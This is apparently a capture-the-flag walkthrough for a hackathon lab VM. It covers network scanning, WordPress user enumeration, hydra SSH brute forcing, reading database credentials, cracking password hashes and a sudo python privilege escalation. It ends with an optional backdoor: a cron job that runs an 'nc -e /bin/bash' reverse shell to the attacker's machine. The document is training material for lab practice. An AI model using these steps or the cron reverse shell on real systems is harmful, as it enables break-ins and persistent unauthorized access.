# **Hackathon 01 - Raven**

This VM was designed to be a Beginner/Intermediate boot2root machine with four flags to find and two intended ways of getting root. This walkthrough showcases one method to achieve root access.

# **01. Reconnaissance Phase**
First, we use `netdiscover` to locate the target machine on the network. Discover the IP of your AttackVM and define the subnet to scan and find the VictimVM. The VictimVM IP should have as a MAC vendor PCS Systemtechnik GmbH.

```bash
sudo netdiscover -r XXX.XXX.XX.0/24
```
Another better alternative is to use arp-scan

```bash
sudo arp-scan -l
```
You can also use filters using pipe command in Linux to find easier (e.g. | command for filtering)

### **Flag 01: MAC Address**
```bash
Flag 01: What is the MAC address of the virtual machine with the vendor PCS?
Answer: XX:XX:XX:XX:XX:XX
```

### Initial Nmap Scan
After finding the HOST IP we will now proceed and use a tool called Nmap. Nmap is a very useful tool to discover hosts and services on a network. Nmap sends packets to target hosts and then analyzes the responses.
We perform an initial scan with Nmap to identify open ports and services running on those ports.
```bash
nmap -sC -sV -oA nmap_results XXX.XXX.XXX.XXX (where XX the VictimVM IP Address)
```
- `-sC`: Run default Nmap scripts
- `-sV`: Detect service version
- `-oA`: Output all formats and store in file `nmap_results`

The scan reveals that SSH, HTTP, and RPC are running on ports 22, 80, and 111 respectively.

### **Flag 02: Apache HTTP version**

```bash
Flag 02: What is the HTTP Version that the victimVM has?
Answer: X.X.XX
```

## **02. Enumeration Phase - Website Enumeraton**
We start by examining the webpage running on port 80 (Open the browser from the AttackVM and put the IP address as a URL with the prefix http://. Next, we use `gobuster` to enumerate hidden directories and files.
```bash
gobuster dir -u http://XXX.XXX.XXX.XXX -w /usr/share/wordlists/dirb/common.txt
```
The results indicate that the site is running WordPress (found in the `/wordpress` directory). The html page to see if we can find anything there. After looking around we can find the first flag located on the a specific html page (e.g. XXX.XXX.XXX.XXX/subpage.html). Seeing the source code we not only getting the first flag but will also get information that this is a Wordpress website.

The

```bash
sudo gem install wpscan
```

### WordPress Scan
Using `wpscan`, we enumerate usernames on the WordPress site.
```bash
wpscan --url http://XXX.XXX.XXX.XXX/wordpress/ -e u
```
The scan reveals two usernames e.g. s******. m******

### **Flag 03: Flag on the source**
Now we got a lot of information. But it is always good to look initially all the information of the webpages, since this will give us more information on what is the purpose of the website. It is very important to know what we are attacking. This will help us better understand how the operates.

```bash
Flag 03: Find flag hidden in one of the subpages (view source of some of the /subpages and search from the word "flag")?
Answer: XXXXXXXXXXXXXXXXXXXX
```

## **03. Initial Access Phase**
We attempt to SSH into the server using the discovered usernames. Through basic brute-forcing. If you don't hav the wordlist you have to download it, or else is on /usr/share/wordlists. But you have to extract from the compressed file. We can use hydra for the bruteforce attack and we put the username to find the password (where m**** is the username):
```bash
hydra -v -f -l m**** -P /usr/share/wordlists/rockyou.txt ssh://XXX.XXX.XXX.XXX
```
We find that password for m**** is ******.

### **Flag 04: Login to SSH and discover files and directories**
We were successfully able to get the password. Go and login using ssh with the command ssh username@XXX.XXX.XXX.XXX where you should define the username and the VictimVM IP.
When login in with ssh lets look on the /var/www to see details about the webservice. Looks like we were able to find flag two in the /var/www directory.
The second flag is located in the `/var/www` directory.
```bash
Flag 04: Find the flag once logged in to the SSH on the following folder.
cat /var/www/flag3.txt
```
### **Flag 05: Hashes in the MySQL database**
For the third flag, we check the MySQL credentials in the `wp_config.php` file. Wordpress uses a MySQL database to store the data (usernames and credetials incuded). The wp_config.php file also includes the credentials for Wordpress to parse the database information.
```bash
Flag 05: Find the password for connecting to the database from the Wordpress Configuration file.
cat /var/www/html/wordpress/wp_config.php
```
### **Flag 06** ###
Using the credentials, we log into the MySQL database and locate the third flag in the `wp_posts` table.
```bash
mysql -u root -p '*******' -h 127.0.0.1
show databases;
use wordpress;
show tables;
select * from wp_posts;
```

Show tables and search for usernames/passwords. We find an unsalted password hash for `s***' in the `wp_users` table. We crack the hash using John the Ripper. This should be done in the AttackVM and not in the SSH of the VictimVM.

```bash
Flag 06: Crack the hash you find from steven inside the database
Answer: XXXXXXX
```
To crack the hash proceed with downloading a wordlist, copy and paste the hash value to a text file of the AttackVM and crack it.

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

## **03. Privilege Escalation Phase**
We can now login to the VictimVM using the new account we found from the hashed password. After gaining access to `******`'s account, we check if has any sudo privileges.
```bash
sudo -l
```
We find that the user can run Python as sudo. Using GTFOBins, we find a privilege escalation method.
```bash
sudo python -c 'import pty;pty.spawn("/bin/bash")'
```
We now have a root shell. The final flag is located in the `/root` directory.Run whoami to see that the user changed to root.
```bash
Flag 07: Go to /root/ folder and find the flag
```
Type the command whoami to check which user is logged in the system. On the root folder # there is the fourth flag.

## Backdoor (Optional)

Now we will try to get a command and control through the back door with a simple Python script First we need to establish a listening session with netcat and we need to specify a port, doesn’t matter which port.
We create a new shell script as a file (command: touch config.sh) and we put the IP address of the AttackVM and a port we need to use for the backdoor.

```bash
#!/bin/bash
nc -e /bin/bash XXX.XXX.XX.XXXX XXXX
```

We then edit the cron tab script to elicit a response

```bash
crontab
```

Add to crontab * * * * * bash /tmp/config.sh
Then we execute the cron job using crontab -e command on the VictimVM and on the AttackVM netcat -lvp XXXX where XXXX is the port number defined on the netcat on the VictimVM. We can test running the command of netcat manually without the cron job.